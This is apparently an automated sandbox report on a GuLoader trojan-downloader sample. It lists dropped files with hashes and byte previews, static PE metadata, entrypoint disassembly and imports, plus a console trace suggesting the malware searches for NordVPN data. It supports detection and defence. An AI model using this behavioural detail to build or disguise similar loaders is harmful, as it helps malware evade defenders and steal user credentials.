                                  Reputation:low
                                  Preview:[Vddelber60]..Paxilla=EKSKOMMUNIKATIONERS..

                                  C:\Users\user\AppData\Local\Temp\GL-1.0.typelib

                                  Download File
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1245
                                  Entropy (8bit):5.462849750105637
                                  Encrypted:false
                                  SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
                                  MD5:5343C1A8B203C162A3BF3870D9F50FD4
                                  SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                                  SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                                  SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co

                                  C:\Users\user\AppData\Local\Temp\HERMAPHRODEITY.ini

                                  Download File
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):40
                                  Entropy (8bit):4.412814895472355
                                  Encrypted:false
                                  SSDEEP:3:bAL2Wlv3AhWuvU2:bu2gYEd2
                                  MD5:176F3A8631F14F0421935D07502B8CD9
                                  SHA1:70C91B54BDE9BA107AB322ECACF16C60E0D8E57B
                                  SHA-256:F507F6BB14F286DD6835A18FC9ECDB86F73DBA96E9E281D626718447F1C496BB
                                  SHA-512:CC963E6BD3577D12FAC185D3D61CCC72098C52E5F2E907E5724BA7BC9FF022A2E74D0DF18D82AD7EC645FEE9328458B7493B1BDD7F1216A677A42F8516568336
                                  Malicious:false
                                  Reputation:low
                                  Preview:[Godgrendes]..Resipiscence=Mightily197..

                                  C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dll

                                  Download File
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):380640
                                  Entropy (8bit):6.00755593352656
                                  Encrypted:false
                                  SSDEEP:6144:tqpZKqQPNb5tPcACMBdK99Uf2o7nypI83l4tHY1706ePrz2lxf:tqEvcA49Ro7R64Pi
                                  MD5:07B4E869E84B557512EE38A5C283FEF3
                                  SHA1:85AFD748ACB7DB97C763ABFEA292E8543B084517
                                  SHA-256:C718B6BF9A427A117FFC1AB1C0E02551AFB2675406BAC625534E02179DB12C9D
                                  SHA-512:C1E7E9781B538D6FD1265DF135606483DCC80B190FFB6DE6C9A7C4DD83B2B4453C746FE7C4E4AE577BE5DD40D4BB98BE8D0325119148D81D8D3CD094E92606E7
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Reputation:low
                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........EK..+...+...+......+...*...+.......+.../...+...(...+.$.*...+...,...+...-...+...*...+...*...+.$.....+.$.+...+.$.....+.......+.$.)...+.Rich..+.........................PE..d...W6;a.........." .........2......$y....................................... .......P....`.........................................pK..T....K..0.......p........!......................T......................(......................h............................text...<........................... ..`.rdata.. ...........................@..@.data....%...........~..............@....pdata...!......."..................@..@.rsrc...p...........................@..@.reloc..............................@..B........................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\applications-other.png

                                  Download File
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):685
                                  Entropy (8bit):7.621282940093077
                                  Encrypted:false
                                  SSDEEP:12:6v/7U+KyobNKxqUPO9/qRw6l2ZK2zirFLDbFJXy+MAg+eElsD8itXaBdHjGGrOKF:N+KyobksUVRqK2+LX/zlsYR3HjGCbx
                                  MD5:8C4F73C63672801A4629BA32BFAF9E31
                                  SHA1:C59877FEA56A2D45E36389366B0CCBC0AC2B720B
                                  SHA-256:DFAFC0CCDCD4A2B74B8F74ECBE0BE82FC9FF3D055A8C9585DD78379DB7F01063
                                  SHA-512:E4479DFE6F342212DA86B0B4BE1095162F07F7AE98AC1921CC9ED7BB650E7024CF80D1A82EA99D3744C9127FA046E82C81D4D82D17152D868DD7D1D78ACE20E5
                                  Malicious:false
                                  Preview:.PNG........IHDR................a...tIDATx.....ki.G.....pm.........c.m.v.....uNr...O......"....\.B.......q.J......|.^^^......g....6..^..NV(..../.wAIi.n.,,.....A~k....5....YwdS.........O/.s.9.k..|v.d......<F.F......z.9 CDn.IzeS.^.w.).V.0.?.._.-.........p?......A.KV..}r...M......<..p......h.hEGg+.Z.$.jx7}LN....,....+...`..-N.6.8....T.T.r.zH.?...@.X...L......fgg..{...........EQq....n.G..{65<.cD)d>.c..V}r.>z.S.D"...[.p.M.4>|.3|..7..j8:.@..5.s.P...N..P..Vi8..<3.g.5...hO..-d..Z.,..........A.Yc..3.5|.Nk.......I.7.*..a..x....2R......sn..0..2...o....Q.)<A..M......%`....P...Q.w. ..G.ggr.F..O5.`.5.(g...7......3l.-d..,..1F..[t.l9.g..FX........IEND.B`.

                                  C:\Users\user\AppData\Local\Temp\folder-symbolic.symbolic.png

                                  Download File
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):166
                                  Entropy (8bit):5.876785121167948
                                  Encrypted:false
                                  SSDEEP:3:yionv//thPl9vt3lAnsrtxBllZMFnt4UoEw2GUqcklEj9h0XGqV/maXyj2fllljp:6v/lhPysLEnt4UoEwsqckGpq6jy/jp
                                  MD5:A008C1D205C5B08639C0A8D8673C6C72
                                  SHA1:5190570B97A6F75F1D10D3D1EC6E46AEC8705B0B
                                  SHA-256:54A3EBAD22462339574D87D835CA626E039E9B38A625806BAA051F80A327C428
                                  SHA-512:AC5F3ED7773C04223650B757F6168FA4F6C57BA4F0C073BD5AB933B96F0FC3AEE918543C4AEA703A9F472045C6FC5CEA012935850F2971A8107772B96F341AB5
                                  Malicious:false
                                  Preview:.PNG........IHDR................a....sBIT....|.d....]IDAT8.c`..8......>... F...4..u...IJ.....43B.......!..X.D.&rl.5...<...IPO......R..3...W......o2...M`....IEND.B`.

                                  C:\Users\user\AppData\Local\Temp\nsn7515.tmp\System.dll

                                  Download File
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):12288
                                  Entropy (8bit):5.814115788739565
                                  Encrypted:false
                                  SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                  MD5:CFF85C549D536F651D4FB8387F1976F2
                                  SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                  SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                  SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\rt64win7.inf

                                  Download File
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:Windows setup INFormation, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1292652
                                  Entropy (8bit):3.864768543104337
                                  Encrypted:false
                                  SSDEEP:3072:veHaqq95T1TpRKkYxyZuSkIRipOp1MbSqh43FFc23lRxSsopQfql1Ody29kn1jYF:XaekadZaJiaeQMV
                                  MD5:2D947C4C9147622CFC588FC5C17DDDEC
                                  SHA1:B367B48D1282E39E37B8992615FF9947DEE8CFED
                                  SHA-256:EBB8155AC71DD53258CE3772F189B4771272BA55E15A6DABDE2BEA6896DC2CC3
                                  SHA-512:3213B423153A1350AA3A0213079EDF21D77022C7839EB3A905F7EE8A02028E6A572499223889A55C2EF4646C0D3B2CB6DC64E1DCCEF26053EF80D34313EAD885
                                  Malicious:false
                                  Preview:..;. .*.*. .C.O.P.Y.R.I.G.H.T. .(.C.). .2.0.0.7.-.2.0.1.3. .R.e.a.l.t.e.k. .C.O.R.P.O.R.A.T.I.O.N.....;.....;. .R.e.a.l.t.e.k. .P.C.I.e. .F.E. .F.a.m.i.l.y. .C.o.n.t.r.o.l.l.e.r.....;. .R.e.a.l.t.e.k. .P.C.I. .G.B.E. .F.a.m.i.l.y. .C.o.n.t.r.o.l.l.e.r.....;. .R.e.a.l.t.e.k. .P.C.I.e. .G.B.E. .F.a.m.i.l.y. .C.o.n.t.r.o.l.l.e.r.....;.........[.v.e.r.s.i.o.n.].....S.i.g.n.a.t.u.r.e. . . .=. .".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s. . . . . . . .=. .N.e.t.....C.l.a.s.s.G.U.I.D. . . .=. .{.4.d.3.6.e.9.7.2.-.e.3.2.5.-.1.1.c.e.-.b.f.c.1.-.0.8.0.0.2.b.e.1.0.3.1.8.}.....P.r.o.v.i.d.e.r. . . . .=. .%.R.e.a.l.t.e.k.%.....D.r.i.v.e.r.V.e.r. . . .=. .0.4./.1.0./.2.0.1.3.,.7...0.7.2...0.4.1.0...2.0.1.3.....C.a.t.a.l.o.g.F.i.l.e...N.T. .=. .r.t.6.4.w.i.n.7...c.a.t.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.R.e.a.l.t.e.k.%.=.R.e.a.l.t.e.k.,. .N.T.a.m.d.6.4.........[.C.o.n.t.r.o.l.F.l.a.g.s.].....E.x.c.l.u.d.e.F.r.o.m.S.e.l.e.c.t. . . . . .=. .*.............[.R.e.a.l.t.e.k...N.T.a.m.d.6.4.].....;. .8.

                                  C:\Users\user\AppData\Local\Temp\subfolder1\Toelike.exe

                                  Download File
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):657569
                                  Entropy (8bit):6.792168991473304
                                  Encrypted:false
                                  SSDEEP:12288:rYgT387AbTc/v4b0h2gdYBXnQLGT/Fp0hZAvcG0ePzNSd01RHqtZCCNfn6THbMcQ:rYgo7AbTc/v4b0h2gqBXnQLGT/Fp0hZf
                                  MD5:34770A449DF27F8C114F7CDCBA217401
                                  SHA1:D6DCEFE169654BF62ED52365464EE948BE8BA461
                                  SHA-256:493381B41D8AFFB72163066BBD9C7C6345AF043E0541E5E344F79CE6B688A536
                                  SHA-512:6D57E22882F3596CE11F6D4FE6B81FADD71DBEACF6EBD2A5AD7CE64498BE0196417E32FC8933231BCA3F3155679BFD2097037EE74C988EC55B7C6F5529F1C977
                                  Malicious:false
                                  Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@..........................`............@.......................................... ..8=...........................................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata...p...............................rsrc...8=... ...>..................@..@................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\trompetens.Pim9

                                  Download File
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):133595
                                  Entropy (8bit):4.03243313791291
                                  Encrypted:false
                                  SSDEEP:1536:VB1BsBB19p0QL7WhuipXeuA+OFq7g+1UhUk8Uhq:VBwj1b0QLqXepET1CFxhq
                                  MD5:0754E785FF6ECE6969E175C9B13C6FE1
                                  SHA1:A03D91669F72C2D8EEC2B86EB6490D6D6BA1A92B
                                  SHA-256:F73CE6049A569409CA192ACD4E36766FA427FB2EF79D15F66DC870A4D04E2713
                                  SHA-512:B386FCBBABFCC55A965722786A60811DCDBB83103A235E01C5889D1C03B6C8A83288D19F4BCC9F5A69D45B5D4B28708D4EC08D043AF7417DD9D18AD88EF3509A
                                  Malicious:false
                                  Preview:}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}

                                  C:\Users\user\AppData\Local\Temp\user-not-tracked-symbolic.svg

                                  Download File
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:SVG Scalable Vector Graphics image
                                  Category:dropped
                                  Size (bytes):4730
                                  Entropy (8bit):4.970880293743837
                                  Encrypted:false
                                  SSDEEP:96:VkoIankPYfLoIJomlXTlUxSHtuubQLqJlm0mxmOmTGmVm/mYmY:VkfcMI64RfIubQW/BEjPoKlp
                                  MD5:8F7C767AFA41E6D03BDE59296DFF8175
                                  SHA1:EEFA541D3A06CAFEB62A535B86D1A95D6AAE1CD6
                                  SHA-256:292770B23ED69AF4EDE9255BB66ADF3D3A0FF62D827D2BA05ED2C44A57228ED6
                                  SHA-512:FFE75CCD2EFFA74E24955BF36DBD86BB1B30F880D233D8F5C5431E99169224E89E7C59FDD052C6F9544E05CF11FD425F01ADD6E87B512C318132D963CB338B04
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg. xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:cc="http://creativecommons.org/ns#". xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#". xmlns:svg="http://www.w3.org/2000/svg". xmlns="http://www.w3.org/2000/svg". width="16". version="1.1". style="enable-background:new". id="svg7384". height="16.000645">. <metadata. id="metadata90">. <rdf:RDF>. <cc:Work. rdf:about="">. <dc:format>image/svg+xml</dc:format>. <dc:type. rdf:resource="http://purl.org/dc/dcmitype/StillImage" />. <dc:title>Gnome Symbolic Icons</dc:title>. <cc:license. rdf:resource="http://creativecommons.org/licenses/by-sa/4.0/" />. </cc:Work>. <cc:License. rdf:about="http://creativecommons.org/licenses/by-sa/4.0/">. <cc:permits. rdf:resource="http://creativecommons.org/ns#Reproduction" />. <cc:permits. rdf:resource="htt

                                  C:\Users\user\AppData\Local\Temp\video-joined-displays-symbolic.symbolic.png

                                  Download File
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):208
                                  Entropy (8bit):6.572781220141588
                                  Encrypted:false
                                  SSDEEP:3:yionv//thPl9vt3lAnsrtxBllUxPFp/7l04sR5/7dY+MK6Ie+ed0oxIwsoazRC4I:6v/lhPysIzlZsfdY+MKda8RC4KymCeVp
                                  MD5:E2FC23D36F5488D1F2888D524F933582
                                  SHA1:335CA8F69FF42E4418F0C95A9626F7B027F62139
                                  SHA-256:07AEFFEAC02CD1501C54E5D66ED1816B83AF04E51B1676AF3C4A538FDC9E9E4A
                                  SHA-512:EA3B15A24F8B3FF83DE6ABB7392A0672A55F1F87DDC485B2AD517E76B48358C852484CF2D23FD7989992676AF73640D6CC2002FD2F0FD2EAA29C39C7DFE503BA
                                  Malicious:false
                                  Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8..1.. .E..@v....P...........8.O.......w4@.8`..I.I....0...&y..../9..r....5..@....P.+..l..*..8..~...@....p...y.#0)....o...fq....>....S.^&.n....IEND.B`.

                                  \Device\ConDrv

                                  Download File
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):30
                                  Entropy (8bit):3.964735178725505
                                  Encrypted:false
                                  SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                  MD5:9F754B47B351EF0FC32527B541420595
                                  SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                  SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                  SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                  Malicious:false
                                  Preview:NordVPN directory not found!..

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                  Entropy (8bit):6.792177380489411
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File size:657569
                                  MD5:e2e4196b84fdf8956baa7f99b11812af
                                  SHA1:7af0382928364f2fc088d13f96394f4d83bd01ae
                                  SHA256:7004d20bac532e4a93f138bae6da90223d850992fd1c88ba176bc9349b802c6a
                                  SHA512:6aa569bb72d22756c0d3a546ed2b8c9e319605dc1421d6da14a95291b5cc0ad390ed7dc8bb63efde83aa80bd82bd0a321d1f7245c7145050f72db04a2a93a06c
                                  SSDEEP:12288:0YgT387AbTc/v4b0h2gdYBXnQLGT/Fp0hZAvcG0ePzNSd01RHqtZCCNfn6THbMcQ:0Ygo7AbTc/v4b0h2gqBXnQLGT/Fp0hZf
                                  TLSH:45E429B2A430868AD5E91EB25E4AB93091B22D7CDCE2110DA9F6370DD6F231145DFB4F
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                                  File Icon

                                  Icon Hash:ac9eb23233b28eaa

                                  Static PE Info

                                  General

                                  Entrypoint:0x403640
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                  Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:61259b55b8912888e90f516ca08dc514

                                  Entrypoint Preview

                                  Instruction
                                  push ebp
                                  mov ebp, esp
                                  sub esp, 000003F4h
                                  push ebx
                                  push esi
                                  push edi
                                  push 00000020h
                                  pop edi
                                  xor ebx, ebx
                                  push 00008001h
                                  mov dword ptr [ebp-14h], ebx
                                  mov dword ptr [ebp-04h], 0040A230h
                                  mov dword ptr [ebp-10h], ebx
                                  call dword ptr [004080C8h]
                                  mov esi, dword ptr [004080CCh]
                                  lea eax, dword ptr [ebp-00000140h]
                                  push eax
                                  mov dword ptr [ebp-0000012Ch], ebx
                                  mov dword ptr [ebp-2Ch], ebx
                                  mov dword ptr [ebp-28h], ebx
                                  mov dword ptr [ebp-00000140h], 0000011Ch
                                  call esi
                                  test eax, eax
                                  jne 00007FBE745493FAh
                                  lea eax, dword ptr [ebp-00000140h]
                                  mov dword ptr [ebp-00000140h], 00000114h
                                  push eax
                                  call esi
                                  mov ax, word ptr [ebp-0000012Ch]
                                  mov ecx, dword ptr [ebp-00000112h]
                                  sub ax, 00000053h
                                  add ecx, FFFFFFD0h
                                  neg ax
                                  sbb eax, eax
                                  mov byte ptr [ebp-26h], 00000004h
                                  not eax
                                  and eax, ecx
                                  mov word ptr [ebp-2Ch], ax
                                  cmp dword ptr [ebp-0000013Ch], 0Ah
                                  jnc 00007FBE745493CAh
                                  and word ptr [ebp-00000132h], 0000h
                                  mov eax, dword ptr [ebp-00000134h]
                                  movzx ecx, byte ptr [ebp-00000138h]
                                  mov dword ptr [0042A318h], eax
                                  xor eax, eax
                                  mov ah, byte ptr [ebp-0000013Ch]
                                  movzx eax, ax
                                  or eax, ecx
                                  xor ecx, ecx
                                  mov ch, byte ptr [ebp-2Ch]
                                  movzx ecx, cx
                                  shl eax, 10h
                                  or eax, ecx

                                  Rich Headers

                                  Programming Language:
                                  • [EXP] VC++ 6.0 SP5 build 8804

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x63d38.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x66760x6800False0.656813401442data6.41745998719IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                  .rdata0x80000x139a0x1400False0.4498046875data5.14106681717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0xa0000x203780x600False0.509765625data4.11058212765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                  .ndata0x2b0000x270000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .rsrc0x520000x63d380x63e00False0.295598990926data5.64645184571IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountry
                                  RT_BITMAP0x523d00x368dataEnglishUnited States
                                  RT_ICON0x527380x4180cdataEnglishUnited States
                                  RT_ICON0x93f480x10828dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                  RT_ICON0xa47700x94a8dataEnglishUnited States
                                  RT_ICON0xadc180x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                  RT_ICON0xb1e400x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 95EnglishUnited States
                                  RT_ICON0xb43e80x988dataEnglishUnited States
                                  RT_ICON0xb4d700x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                  RT_DIALOG0xb51d80xb8dataEnglishUnited States
                                  RT_DIALOG0xb52900x144dataEnglishUnited States
                                  RT_DIALOG0xb53d80x13cdataEnglishUnited States
                                  RT_DIALOG0xb55180x100dataEnglishUnited States
                                  RT_DIALOG0xb56180x11cdataEnglishUnited States
                                  RT_DIALOG0xb57380x60dataEnglishUnited States
                                  RT_GROUP_ICON0xb57980x68dataEnglishUnited States
                                  RT_VERSION0xb58000x1f4dataEnglishUnited States
                                  RT_MANIFEST0xb59f80x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                  Imports

                                  DLLImport
                                  ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                  SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                  ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                  COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
